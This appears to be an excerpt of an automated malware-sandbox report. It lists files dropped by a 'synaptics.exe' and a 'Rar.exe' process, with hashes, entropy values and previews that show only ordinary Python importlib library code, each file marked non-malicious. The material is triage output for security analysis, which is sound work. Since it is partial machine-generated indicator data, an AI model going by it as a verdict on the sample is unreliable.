                                                                                                                                                                                      Preview:o........'-d.{.......................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l.m"Z"..d.d.l#m$Z$m%Z%m&Z&m'Z'..g.d...Z(G.d.d...d.e)..Z*G.d.d...d...Z+G.d.d...d.e..,d.d.....Z-G.d.d...d.e...Z/G.d.d...d.e/..Z0G.d.d...d...Z1G.d.d...d.e1e2..Z3G.d.d ..d e.j4..Z5G.d!d"..d"..Z6G.d#d$..d$..Z7G.d%d&..d&e!..Z8G.d'd(..d(..Z9G.d)d*..d*..Z:G.d+d,..d,..Z;G.d-d...d.e8..Z<G.d/d0..d0e7..Z=d1d2..Z>d3d4..Z?d5e.j.f.d6d7..Z@d8d9..ZAd5e'e0e3f...f.d:d;..ZBd<d=..ZCd>d?..ZDd5e%eEe$eE..f...f.d@dA..ZFd.S.)B.....N.....)..._adapters.._meta)...PackageMetadata)...FreezableDefaultDict..Pair)...method_cache..pass_none)...unique_everseen).r......SimplePath)...suppress)...import_module)...MetaPathFinder)...starmap)...List..Mapping..Optional..Union)...Distribution..DistributionFinderr......PackageNotFoundError..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2357
                                                                                                                                                                                      Entropy (8bit):5.1624174943294525
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:2NuvHOKjpXocKHdq5UHdUktPdSNwplt9SDYvloUTG:nHOKVocKHdqUdUWlSWplZ9oEG
                                                                                                                                                                                      MD5:A945D7BB9F2DE2BF3460500751A23CA6
                                                                                                                                                                                      SHA1:4E5D568C85CD04770363C5C086DECB6CD097BCB6
                                                                                                                                                                                      SHA-256:CC812D97107EA715BE48A6D4E29A2E0BF4DEC3A9E0FD36718A5B646647C154BE
                                                                                                                                                                                      SHA-512:4529EDC37BEACD04FFAF163A753FC90855692004201B503C9DE31BEFE53EB14C4B83B68D295300343F04E7E2FF249A1762E529D253BC5102BCADDABB7619CEC0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s<...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...G.d.d...d.e.j.j...Z.d.S.)......N.....)...FoldedCasec........................sb...e.Z.d.Z.e.e.e.g.d.......Z...d.e.j.j.f...f.d.d...Z.d.d...Z...f.d.d...Z.d.d...Z.e.d.d.....Z.....Z.S.)...Message).Z.Classifierz.Obsoletes-DistZ.Platformz.Project-URLz.Provides-Distz.Provides-Extraz.Requires-Distz.Requires-Externalz.Supported-PlatformZ.Dynamic..origc........................s"...t.....|...}.t.|.....t.|.......|.S...N)...super..__new__..vars..update)...clsr......res....__class__...@C:\Users\Public\QExvbmVOb25l\lib\importlib\metadata\_adapters.pyr........s..........z.Message.__new__c....................O...s....|.....|._.d.S.r....)..._repair_headers.._headers)...self..args..kwargsr....r....r......__init__#...s......z.Message.__init__c........................s....t.......S.r....).r......__iter__..r....r....r....r....r....'...s......z.Message.__iter__c........................s>...d.d.......f.d.d...t.|...d...D...}.|.j.r
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1532
                                                                                                                                                                                      Entropy (8bit):5.027155941299097
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:zBf0kCRklLM8ZOSIJOmhgP3uSDOTVMPt/fkWB16RB6lghkChedco/qq6Ddqrqqp:zBf0Xkl4KOSI4mh6peqdcWB1cegfhe+y
                                                                                                                                                                                      MD5:A5646FFF089FF9D442BAAF434C70042E
                                                                                                                                                                                      SHA1:00EDB10142F241C6317C908DEE1A5F8DC403386B
                                                                                                                                                                                      SHA-256:3CA7DF4106EA2F4EA77424EC5D34B5A90AE3DF2D783D86AA3592CAA4608C1421
                                                                                                                                                                                      SHA-512:B2E20FC96E2905E0393DA4634192CA5830D05611A58DE9391F6C92AE7D5CFCE7C006D988A3088C78A7C57FF7B3BB35446143EE71AF5354DE8C532184D28E688F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s6...d.d.l.Z.G.d.d...d.e.j...Z.G.d.d...d.e...d.d.....Z.d.S.)......Nc........................s(...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.....Z.S.)...FreezableDefaultDicta!.... Often it is desirable to prevent the mutation of. a default dict after its initial construction, such. as to prevent mutation during iteration... >>> dd = FreezableDefaultDict(list). >>> dd[0].append('1'). >>> dd.freeze(). >>> dd[1]. []. >>> len(dd). 1. c........................s....t.|.d.t...j...|...S.).N.._frozen)...getattr..super..__missing__)...self..key....__class__...CC:\Users\Public\QExvbmVOb25l\lib\importlib\metadata\_collections.pyr........s......z FreezableDefaultDict.__missing__c........................s......f.d.d....._.d.S.).Nc........................s..........S.).N)...default_factory).r......r....r....r......<lambda>....s......z-FreezableDefaultDict.freeze.<locals>.<lambda>).r....r....r....r....r......freeze....s......z.FreezableDefa
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3122
                                                                                                                                                                                      Entropy (8bit):5.099012480219499
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:bHbuTGKoOIXlUsSUUEQ1lGIGX5G5GurSYwBpHPdG7lfsJdSOTK/J/SarXN0le/y/:SoOCDUX4sXwjvMXNpa5m1qoOIk
                                                                                                                                                                                      MD5:2F582BB9C2487DB134E9151251D7ABF3
                                                                                                                                                                                      SHA1:BE4B5312C7EA3C78DBA4E674C81156532ED25EB1
                                                                                                                                                                                      SHA-256:238BBEDBF5D7FF50D09CFCC16A798AFC5DB31D324943C4CE35D72293C0976E59
                                                                                                                                                                                      SHA-512:CE38E852763480ECCBE5716F480F55B856FABEA6AB0DEB0C3E19BAE91025FD44631EB5804DEFCE7B2ACBEBE6254D9C0802AC69F049D1B39894416C6FD27C7802
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s&...d.d.l.Z.d.d.l.Z.d.d.d...Z.d.d...Z.d.S.)......Nc........................s(.....p.t...........f.d.d...}.d.d...|._.|.S.).aV.... Wrap lru_cache to support storing the cache data in the object instances... Abstracts the common paradigm where the method explicitly saves an. underscore-prefixed protected property on first call and returns that. subsequently... >>> class MyClass:. ... calls = 0. .... ... @method_cache. ... def method(self, value):. ... self.calls += 1. ... return value.. >>> a = MyClass(). >>> a.method(3). 3. >>> for x in range(75):. ... res = a.method(x). >>> a.calls. 75.. Note that the apparent behavior will be exactly like that of lru_cache. except that the cache is stored on each instance, so values in one. instance will not flush values from another, and when an instance is. deleted, so are the cached values for that instance...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):584
                                                                                                                                                                                      Entropy (8bit):5.1754631872640635
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:Cu//48ZPUbmR6OHRgD4gvwfJLV0jyr4e+VlWsoVzoufN++k+Zqq18:ZDPUe6+k4fJgyEd/3ODlfnZqq18
                                                                                                                                                                                      MD5:9A58998F488FAD41F647EF17C4E75473
                                                                                                                                                                                      SHA1:DEC27CB647961DE00E613C788BF5DB87F62E5F0B
                                                                                                                                                                                      SHA-256:47A6511EC14D7AE358B5644C750AE5670ADC687C9BA39A4724C91A955152D017
                                                                                                                                                                                      SHA-512:A3E0637D1D2A7AB1E88D769687768DC03E04AB7B1373F3D7F52CACB0A3D8BB820653001E938B4AB16C138571B30F9B28E2FF015838F12409B38E047E5AF31782
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dr........................@...s....d.d.l.m.Z...d.d.d...Z.d.S.)......)...filterfalseNc....................c...sf.....t...}.|.j.}.|.d.u.r.t.|.j.|...D.].}.|.|.....|.V...q.d.S.|.D.].}.|.|...}.|.|.v.r0|.|.....|.V...q.d.S.).zHList unique elements, preserving order. Remember all elements ever seen.N)...set..addr......__contains__)...iterable..key..seenZ.seen_add..element..k..r.....AC:\Users\Public\QExvbmVOb25l\lib\importlib\metadata\_itertools.py..unique_everseen....s..................................r....).N)...itertoolsr....r....r....r....r....r......<module>....s........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2277
                                                                                                                                                                                      Entropy (8bit):4.728131821412717
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:OgnzBuSda0dUuJpYwj1JEZNmsZBCdHEjX9vlq:OgNuaa0dUAp/j1JErm8BCdHED90
                                                                                                                                                                                      MD5:D66D488C70AA8DB7494B85B0B9BAF650
                                                                                                                                                                                      SHA1:524D57EBA2AA4559F8B7AFFD8CF3C4CEE97BAE11
                                                                                                                                                                                      SHA-256:EBCF36AA14661C9EC17CD61FD1B9467A73BD4285C925B64DA65C6F8EEFE62D2A
                                                                                                                                                                                      SHA-512:1E386EA8D4FF77A835E9766ADF016248160B006941DC88D294EF4CD93E75D22DDA15C81E125A8353A3D03E721D05C001F69023B2F6BC874C348BA20E8FFCAE26
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sP...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.)......)...Any..Dict..Iterator..List..Protocol..TypeVar..Union.._Tc....................@...s....e.Z.d.Z.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.e...f.d.d...Z.d.d.e.d.e.d.e.e.e...e.f...f.d.d...Z.e.d.e.e.e.e.e.e...f...f...f.d.d.....Z.d.S.)...PackageMetadata..returnc....................C........d.S...N......selfr....r.....<C:\Users\Public\QExvbmVOb25l\lib\importlib\metadata\_meta.py..__len__...........z.PackageMetadata.__len__..itemc....................C...r....r....r....).r....r....r....r....r......__contains__....r....z.PackageMetadata.__contains__..keyc....................C...r....r....r....).r....r....r....r....r......__getitem__....r....z.PackageMetadata.__getitem__c....................C...r....r....r....r....r....r....r......__iter__....r....z.PackageMetadata.__iter__...name..failobjc....................C........d.S.).zP. Return all value
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3073
                                                                                                                                                                                      Entropy (8bit):5.062882220134745
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:1OhFXWTrbGowYRzHinOrIAeQc2u4KryOqugqhFqYbvHqILqtk3RO/8C9HqL7dRjN:1EowCmVAeQgdqfq/qIqoqu9UHqHdRjqu
                                                                                                                                                                                      MD5:874750D4585F4E8EC80DC8D6F8F1F36B
                                                                                                                                                                                      SHA1:E2ADC94FBC1C4971051E0E23DCE850623F297FED
                                                                                                                                                                                      SHA-256:C297610AFA632C13A42B428B32FC9DBCCA38ECE3FDFC7F91E733CD751EDC26A7
                                                                                                                                                                                      SHA-512:F9BC17882257E40C24AB0C74580857C9C01331839A673125DC70FFCAB7DF762C3EE60751AC9C225A55B5751C0CC9D29CB908C433606560F8BC6BDFA7F912D114
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s(...d.d.l.Z.d.d.l.m.Z...G.d.d...d.e...Z.d.S.)......N.....)...method_cachec........................sr...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z...f.d.d...Z.d.d...Z.e...f.d.d.....Z.d.d...Z.d.d.d...Z.....Z.S.)...FoldedCasea{.... A case insensitive string class; behaves just like str. except compares equal when the only variation is case... >>> s = FoldedCase('hello world').. >>> s == 'Hello World'. True.. >>> 'Hello World' == s. True.. >>> s != 'Hello World'. False.. >>> s.index('O'). 4.. >>> s.split('O'). ['hell', ' w', 'rld'].. >>> sorted(map(FoldedCase, ['GAMMA', 'alpha', 'Beta'])). ['alpha', 'Beta', 'GAMMA'].. Sequence membership is straightforward... >>> "Hello World" in [s]. True. >>> s in ["Hello World"]. True.. You may test for set inclusion, but candidate and elements. must both be folded... >>> FoldedCase("Hello World") in {s}. True. >>> s in {FoldedCa
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1930
                                                                                                                                                                                      Entropy (8bit):4.343405359021804
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:DwGF15jVN5+LjtoIKEuFIw5oGpEnFSy1lkVsqG31WCkG:8mXjX5+uE1Fnl8SWCkG
                                                                                                                                                                                      MD5:A046E808A33BE9907CFC850E6DC30E7D
                                                                                                                                                                                      SHA1:726D08E414D5AC2A7DDF12E61A61FCF1A6BA04DF
                                                                                                                                                                                      SHA-256:863E49569310894ED3F41F966A4883B0FD1684829DDC4E7694A73E083A89112D
                                                                                                                                                                                      SHA-512:4D629301D8208E2CFE7533791188C69BE66B547AF2DE1D6FA53AF64581BC7378FEAA417E1F78629F26E8411C0CA291A937C8C424D7FFCCBEA6D7A28B2B5746C4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import re..import textwrap..import email.message....from ._text import FoldedCase......class Message(email.message.Message):.. multiple_use_keys = set(.. map(.. FoldedCase,.. [.. 'Classifier',.. 'Obsoletes-Dist',.. 'Platform',.. 'Project-URL',.. 'Provides-Dist',.. 'Provides-Extra',.. 'Requires-Dist',.. 'Requires-External',.. 'Supported-Platform',.. 'Dynamic',.. ],.. ).. ).. """.. Keys that may be indicated multiple times per PEP 566... """.... def __new__(cls, orig: email.message.Message):.. res = super().__new__(cls).. vars(res).update(vars(orig)).. return res.... def __init__(self, *args, **kwargs):.. self._headers = self._repair_headers().... # suppress spurious error from mypy.. def __iter__(self):.. return super().__iter__()..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):773
                                                                                                                                                                                      Entropy (8bit):4.707400693185867
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:ysSCg72MrelLMEdrqbM1Mgd5aWqp/IV/MZhmuyNSKtVYCy:ytYlLMZ3y5aWowVEZ8m
                                                                                                                                                                                      MD5:0E214D282C8470C634BBA8872B3DC139
                                                                                                                                                                                      SHA1:98850B764D8FD22830CB9014E2528FE5FE36C315
                                                                                                                                                                                      SHA-256:4281B8DA21C38B837C93E93916D6BBC0A01F7E023C7D39251E3B80250F7D575E
                                                                                                                                                                                      SHA-512:9F024100BFCEA2ABCD2587C97CE0E35B7BF485A972C879883DA99E8F1A4A5931F9A9A2963354AF2389CB46314F1EBF43C09DCC5E30D25790E1470EC6E9539B01
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import collections......# from jaraco.collections 3.3..class FreezableDefaultDict(collections.defaultdict):.. """.. Often it is desirable to prevent the mutation of.. a default dict after its initial construction, such.. as to prevent mutation during iteration..... >>> dd = FreezableDefaultDict(list).. >>> dd[0].append('1').. >>> dd.freeze().. >>> dd[1].. [].. >>> len(dd).. 1.. """.... def __missing__(self, key):.. return getattr(self, '_frozen', super().__missing__)(key).... def freeze(self):.. self._frozen = lambda key: self.default_factory()......class Pair(collections.namedtuple('Pair', 'name value')):.. @classmethod.. def parse(cls, text):.. return cls(*map(str.strip, text.split("=", 1)))..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2999
                                                                                                                                                                                      Entropy (8bit):4.6344062686720875
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:b8buTGBskHc4SpcJ1lGRGX5GEGuvSpQIgQyAdGnlfsJdSpzTKjJkmSphBlle/RlV:bgst6XJyQIT4bhU5I4NrM3IT4W
                                                                                                                                                                                      MD5:656CF285C9D4FAE91F3F4B02851338D5
                                                                                                                                                                                      SHA1:4F4293F48C7C74C7B0EC949AF3CC526C4F59084B
                                                                                                                                                                                      SHA-256:DA7408563C04CAD511DAEBF9E2A1091AD148DEF11A388437D05B97A5618B881D
                                                                                                                                                                                      SHA-512:453138A2FA3974AD3614842CE0948C439167513ACB18243E76C37449AAB71693600966A014690A0FCB0C246A01D0AFE10CFC269C44C904FF37F88DE197508CB3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import types..import functools......# from jaraco.functools 3.3..def method_cache(method, cache_wrapper=None):.. """.. Wrap lru_cache to support storing the cache data in the object instances..... Abstracts the common paradigm where the method explicitly saves an.. underscore-prefixed protected property on first call and returns that.. subsequently..... >>> class MyClass:.. ... calls = 0.. ..... ... @method_cache.. ... def method(self, value):.. ... self.calls += 1.. ... return value.... >>> a = MyClass().. >>> a.method(3).. 3.. >>> for x in range(75):.. ... res = a.method(x).. >>> a.calls.. 75.... Note that the apparent behavior will be exactly like that of lru_cache.. except that the cache is stored on each instance, so values in one.. instance will not flush values from another, and when an instance is.. deleted, so are the cached values for that instance..... >>> b = MyClass()..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):626
                                                                                                                                                                                      Entropy (8bit):4.225594095287608
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:19uQ6NyMeKuDRJLV0jyT0V9pEoQsRXGeFWKgOJALe8XWGJ:19uHdxWJgyTQ/EeRXGaWzNLe8tJ
                                                                                                                                                                                      MD5:07DBBC13A3B5D33F9F06FB6D0FCF07D7
                                                                                                                                                                                      SHA1:6C4B8BBDA2B067E3FB502202494CA772312203D7
                                                                                                                                                                                      SHA-256:8E3C80F7BDB8A3FBB6E0373489C150CE0F0767D79DD829A0662903CA1010049B
                                                                                                                                                                                      SHA-512:F0934CD582BCA775CF413BEBA56BC50823A2BB2C32D252AE36AD6568B97DB268FB0FE993982381648FBD03AFF7B9055097D56828702B9D4EA4F51D2AD179BAB8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from itertools import filterfalse......def unique_everseen(iterable, key=None):.. "List unique elements, preserving order. Remember all elements ever seen.".. # unique_everseen('AAAABBBCCDAABBB') --> A B C D.. # unique_everseen('ABBCcAD', str.lower) --> A B C D.. seen = set().. seen_add = seen.add.. if key is None:.. for element in filterfalse(seen.__contains__, iterable):.. seen_add(element).. yield element.. else:.. for element in iterable:.. k = key(element).. if k not in seen:.. seen_add(k).. yield element..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1177
                                                                                                                                                                                      Entropy (8bit):4.6714418925368735
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1RE8HI89tYIWOtGFK4BWYvcqjVFi20zGhH:/Z9aIrtAK4gec2/0zGl
                                                                                                                                                                                      MD5:EADE85F75510D406899FFA83EB10364B
                                                                                                                                                                                      SHA1:03019F6300B3950090809E6C53D68B51C565165F
                                                                                                                                                                                      SHA-256:D350F8C337081981259C3D18B292116194D8DF095C7F403EEF0EEE0D52E30166
                                                                                                                                                                                      SHA-512:DB1210420A3A99A4DD5E610B1D36C59809F4D7811D7DA0944BAD43CB4F82326384C98CFFCC361084D54CFF7A07D031374EF30B04BA056249AE6E91A7EE9051B5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Any, Dict, Iterator, List, Protocol, TypeVar, Union......_T = TypeVar("_T")......class PackageMetadata(Protocol):.. def __len__(self) -> int:.. ... # pragma: no cover.... def __contains__(self, item: str) -> bool:.. ... # pragma: no cover.... def __getitem__(self, key: str) -> str:.. ... # pragma: no cover.... def __iter__(self) -> Iterator[str]:.. ... # pragma: no cover.... def get_all(self, name: str, failobj: _T = ...) -> Union[List[Any], _T]:.. """.. Return all values associated with a possibly multi-valued key... """.... @property.. def json(self) -> Dict[str, Union[str, List[str]]]:.. """.. A JSON-compatible form of the metadata... """......class SimplePath(Protocol):.. """.. A minimal subset of pathlib.Path required by PathDistribution... """.... def joinpath(self) -> 'SimplePath':.. ... # pragma: no cover.... def __div__(self) -> 'SimplePath':
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2297
                                                                                                                                                                                      Entropy (8bit):4.6525371068604136
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:BUu/H8O42w9/2kz8/WVy1wux7QcY5Djwa7TrbjmfVbp5bWYLE7faS5E4wz0u3v:BUM8O1w9/2kz8/W41wA7QcenFqVp3v
                                                                                                                                                                                      MD5:A6554E82888F65E2D55C209B7FD9125C
                                                                                                                                                                                      SHA1:B4868D5C4861262B0B4394606D72DE2BF72913CA
                                                                                                                                                                                      SHA-256:87B52AB0F393B60FE5D9BFDB0A019A18395B0A127D133847763A873D5D1F68DB
                                                                                                                                                                                      SHA-512:FC7ACCDB79B99AFFA43127AB7711CBA18A9D735A14975FD1D2D05168D50C2282112D0E08CD2BF8AA58DD0F07A0D1FEA2967F4641ADD5E3D96988A898E75B779A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import re....from ._functools import method_cache......# from jaraco.text 3.5..class FoldedCase(str):.. """.. A case insensitive string class; behaves just like str.. except compares equal when the only variation is case..... >>> s = FoldedCase('hello world').... >>> s == 'Hello World'.. True.... >>> 'Hello World' == s.. True.... >>> s != 'Hello World'.. False.... >>> s.index('O').. 4.... >>> s.split('O').. ['hell', ' w', 'rld'].... >>> sorted(map(FoldedCase, ['GAMMA', 'alpha', 'Beta'])).. ['alpha', 'Beta', 'GAMMA'].... Sequence membership is straightforward..... >>> "Hello World" in [s].. True.. >>> s in ["Hello World"].. True.... You may test for set inclusion, but candidate and elements.. must both be folded..... >>> FoldedCase("Hello World") in {s}.. True.. >>> s in {FoldedCase("Hello World")}.. True.... String inclusion works as long as the FoldedCase object.. is on the right..... >>> "hello"
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3710
                                                                                                                                                                                      Entropy (8bit):4.50184813832295
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:dQTYLJ6HsxJyXmiq3YY2ZLsr4B/f0fFvQQ0txuJ/anYG+8rzYZeZzDrJeSHsv:dQTSJI0J8miCYt5sr4d8NvQ2CrZrJeAi
                                                                                                                                                                                      MD5:1DF7A85C79AB990FF6C103B011A7E3F6
                                                                                                                                                                                      SHA1:BC301AEA53C43DFD4992A91B186F341B8EFAD364
                                                                                                                                                                                      SHA-256:DFF87F82CF85D623B847DB323E6B202B96EB0081DD38C3FEC105501F61E76644
                                                                                                                                                                                      SHA-512:0162DF97A485B31004EB30B7F5A7B4BCD21EEFC629F1F074BC95BD0BCF2F17119162B5B0A31DF989022606B8B223888E26A5C93D985F47287AE25DEEC51B7851
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import collections..import zipfile..import pathlib..from . import abc......def remove_duplicates(items):.. return iter(collections.OrderedDict.fromkeys(items))......class FileReader(abc.TraversableResources):.. def __init__(self, loader):.. self.path = pathlib.Path(loader.path).parent.... def resource_path(self, resource):.. """.. Return the file system path to prevent.. `resources.path()` from creating a temporary.. copy... """.. return str(self.path.joinpath(resource)).... def files(self):.. return self.path......class ZipReader(abc.TraversableResources):.. def __init__(self, loader, module):.. _, _, name = module.rpartition('.').. self.prefix = loader.prefix.replace('\\', '/') + name + '/'.. self.archive = loader.archive.... def open_resource(self, resource):.. try:.. return super().open_resource(resource).. except KeyError as exc:.. raise FileNotFoundEr
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5890
                                                                                                                                                                                      Entropy (8bit):4.644653304355339
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:4l35Yo7C0GS2p0Wnnj5qZM3Qeudi7ulaGmVXluXkkoVfpo/AHakVEOa1mqPfySFo:Nwdrl4PuQFnXWO8m6yS8RNNVRWamKmHu
                                                                                                                                                                                      MD5:D24BF8D3E22BE65665C6B3D52722B4A7
                                                                                                                                                                                      SHA1:D13D69A159B6B7C13AFC323C1F03732E14BF7BC6
                                                                                                                                                                                      SHA-256:5EF2C3E328392BFC4E0CFCE2D2E958DFDD0B77D8C28AB9FA3DB2B615D14E933B
                                                                                                                                                                                      SHA-512:9F3594CC4C45BF4EF92645CDC5C1278AA7CA911B34A1556CEEA7A9A7740C3405C111CC78ECD4B55FBB893BC0B984F4A71F24596CBBFF6C78EE58660D91014C7E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import os..import io....from . import _common..from ._common import as_file, files..from .abc import ResourceReader..from contextlib import suppress..from importlib.abc import ResourceLoader..from importlib.machinery import ModuleSpec..from io import BytesIO, TextIOWrapper..from pathlib import Path..from types import ModuleType..from typing import ContextManager, Iterable, Union..from typing import cast..from typing.io import BinaryIO, TextIO..from collections.abc import Sequence..from functools import singledispatch......__all__ = [.. 'Package',.. 'Resource',.. 'ResourceReader',.. 'as_file',.. 'contents',.. 'files',.. 'is_resource',.. 'open_binary',.. 'open_text',.. 'path',.. 'read_binary',.. 'read_text',..]......Package = Union[str, ModuleType]..Resource = Union[str, os.PathLike]......def open_binary(package: Package, resource: Resource) -> BinaryIO:.. """Return a file-like object opened for binary reading of the resource.""".. resource = _co
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11789
                                                                                                                                                                                      Entropy (8bit):4.482128155113969
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:GKdRi99RbmAOewx9ifK/steJyqqowIoaY23XX10C8zCNQy7GE7GtXkDMbzq:GKji9DbmAOec9iUJct23ozCNQydbMq
                                                                                                                                                                                      MD5:2B78D189CD0CB5B765B9F19AC18DCE5B
                                                                                                                                                                                      SHA1:B61170AB37D283DB0CE4FA9918C8ADEABD98754D
                                                                                                                                                                                      SHA-256:B9A599E9047040EC13892BF784BE3C733E5A2D8EFF39331EF66CFBADD6B169CD
                                                                                                                                                                                      SHA-512:FE4D475A40C1F19C07A0FB811D3A823C50F654F8E9E57C119EAAE03D05CC40BE4A01EB1DFEC9CEFE2FBF9919BBF30BBDB68C07896A271DFB1DB757BDC22CBEAE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
